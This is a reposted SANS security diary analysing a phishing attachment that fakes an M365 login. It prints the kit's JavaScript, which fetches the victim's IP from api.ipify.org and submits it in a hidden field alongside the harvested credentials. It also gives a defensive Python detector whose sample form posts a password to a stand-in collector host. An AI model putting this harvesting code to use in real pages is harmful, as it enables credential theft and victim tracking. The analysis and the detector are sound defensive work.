Phishing Kit Collecting Victim's IP Address, (Sat, May 20th)


While reviewing my last findings today, I found a phishing email that delivered a classic .shtml file called “PROFORMA INVOICE.shtml”. So far, nothing special: emails like this one are widespread. When you open the file in a sandbox, it reveals a classic form:

The potential victim is asked to enter his/her M365 credentials to reveal the Excel sheet (the email address has been obfuscated). I had a quick look at the HTML code and found something interesting in the HTTP form:


This means that a variable called “ip” will be submitted with the form at the same time as the credentials. Further down in the file, there was some obfuscated JavaScript code:

    const getip = async () => {
        const payl = await postData("https://api.ipify.org/?format=json", {}, "GET");
        document.getElementById("hIP").value = payl.ip;
        return payl.ip;
    }
    getip();
    async function postData(url = '', data = {}, method="POST") {
        const response = await fetch(url, {
            method, 
            mode: 'cors', 
            cache: 'no-cache', 
            headers: {
                'Content-Type': 'application/json'
            },
            body: (method.toLowerCase() === "post") ? JSON.stringify(data) : null
        });
        return response.json(); // parses JSON response into native JavaScript objects
    }

The line in red (the assignment to the value of hIP) assigns the victim’s public IP address to the hIP element, which is then exfiltrated with the credentials.

Note that this piece of JavaScript is a perfect example of how to contact an API and extract data from the JSON response!
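Attachments like this one can be triaged statically. The following Python code is an added example, not code from the diary or from the phishing kit: it flags an HTML file that combines a password field, a call to an IP-lookup service, and a hidden field whose value is filled in by script. The names `audit` and `is_suspicious`, the host list, and the sample markup (a hidden input with name "ip" and id "hIP", as the description above suggests) are assumptions.

```python
import re
from html.parser import HTMLParser

# Hosts to flag; api.ipify.org is the one in this sample (extend as needed).
IP_LOOKUP_HOSTS = ("api.ipify.org",)
# Matches script that fills a field: getElementById("<id>").value = ...
ASSIGN = re.compile(r"""getElementById\(\s*["']([^"']+)["']\s*\)\s*\.value\s*=(?!=)""")

class FormAudit(HTMLParser):
    """Collect hidden/password inputs and inline script text."""
    def __init__(self):
        super().__init__()
        self.hidden, self.scripts = {}, []   # hidden: element id -> field name
        self.has_password = self._in_script = False
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        kind = (a.get("type") or "").lower()
        if tag == "script":
            self._in_script = True
        elif tag == "input" and kind == "password":
            self.has_password = True
        elif tag == "input" and kind == "hidden" and a.get("id"):
            self.hidden[a["id"]] = a.get("name") or ""
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)

def audit(html):
    p = FormAudit()
    p.feed(html)
    js = "".join(p.scripts)
    # Keep only script-assigned ids that belong to hidden form inputs.
    filled = {m.group(1) for m in ASSIGN.finditer(js)} & set(p.hidden)
    return {"credential_form": p.has_password,
            "ip_lookup_hosts": [h for h in IP_LOOKUP_HOSTS if h in js],
            "script_filled_hidden": sorted((i, p.hidden[i]) for i in filled)}

def is_suspicious(r):
    return bool(r["credential_form"] and r["ip_lookup_hosts"] and r["script_filled_hidden"])

# Constructed sample; only "ip", "hIP" and api.ipify.org come from the diary.
SAMPLE = """<form method="post" action="https://collector.example/x">
<input type="password" name="pass"><input type="hidden" name="ip" id="hIP"></form>
<script>fetch("https://api.ipify.org/?format=json").then(r => r.json())
.then(payl => { document.getElementById("hIP").value = payl.ip; });</script>"""
```

Calling `audit(SAMPLE)` reports the hidden field as the pair `("hIP", "ip")`, that is, the element id the script writes to and the field name submitted with the credentials.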

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS.

Alex Post